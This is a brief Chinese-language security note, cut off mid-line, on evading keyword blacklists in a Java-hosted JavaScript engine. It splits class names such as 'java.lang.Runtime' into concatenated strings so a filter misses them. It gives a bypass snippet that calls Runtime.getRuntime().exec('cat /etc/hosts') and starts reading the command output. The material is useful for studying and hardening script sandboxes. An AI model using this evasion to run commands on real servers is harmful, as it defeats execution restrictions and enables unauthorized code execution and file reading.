javascript支持各种奇怪的语法来执行类方法,导致常规的检查代码中是否包含此类名,来限制命令执行被绕过:
var String= java['lang']["String"];
var String= ”java.lang.String";
var String=java['lan'+'g']['Str'+'ing']['valueOf']('8');
绕过方式一:
var input= java['lang']['Ru'+'ntime']['getR'+'untime']()['exec']('cat /etc/hosts').getInputStream();
u = new Packages.java.util.Scanner(input, "UTF-8").useDelimiter